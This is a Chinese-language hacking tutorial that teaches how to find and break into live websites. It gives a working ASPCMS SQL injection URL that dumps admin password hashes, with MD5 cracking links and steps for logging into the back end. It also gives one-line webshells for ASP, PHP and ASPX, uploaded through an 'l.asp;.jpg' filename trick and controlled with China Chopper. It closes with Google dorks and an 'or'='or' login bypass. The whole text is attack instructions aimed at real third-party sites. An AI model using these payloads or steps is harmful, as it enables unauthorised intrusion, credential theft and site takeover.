一、Powered by aspcms.com Copyright ?2010-2011
步奏1.
首先谷歌关键字 Powered by aspcms.com Copyright ?2010-2011
步奏2.
可以看到有许多站 随便进去一个
接着利用注入漏洞
/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user
把这段文字添加到域名后面 比如 www.kastas.cn 就把这段文字添加到这个cn后面
显示:
发表于:2014-4-26 8:26:00 评论者:admin IP:
ea42f1bc4322ef9d
首页上一页1下一页末页
ea42f1bc4322ef9d 这个就是网站密码 我们去解这个密码 http://pmd5.com/?action=getpwd
明文:ella98744
步奏3.
去登陆后台
********************************************************************************
原理1.
Powered by aspcms.com Copyright ?2010-2011 注入原理
(wait)
原理2.
MD5破解网站
http://md5.syue.com/OtherSite-md5.Asp
二、织梦内容管理系统 V57_GBK_SP1
方法:织梦通杀工具
三、中国菜刀
步奏1.
<%eval request("520")%> 这个一句话木马 放在记事本里 然后另存为
然后保存类型 选择为所有文件 文件名 为l.asp;.jpg 也就是桌面上那个
好了 把这个上传
步奏2.
用菜刀连接了
原理
菜刀
参考 http://huaidan.org/archives/3472.html
Asp环境:<%eval request("a")%>
Php环境:<?php @eval($_POST['a']);?>
Aspx环境:<% @page Language="Jscript"><%eval(Request.item["a"],"unsafe");%>
四、inurl:download_ok.asp?
步奏1.
关键字:inurl:download_ok.asp?
步奏2.后台
/admin
账户名和密码 输入 'or'='or'
*扩展
漏洞
http://www.ihonker.org/forum.php?mod=viewthread&tid=5303&extra=page=1&orderby=dateline
后台
http://www.myhack58.com/Article/html/3/8/2014/49569.htm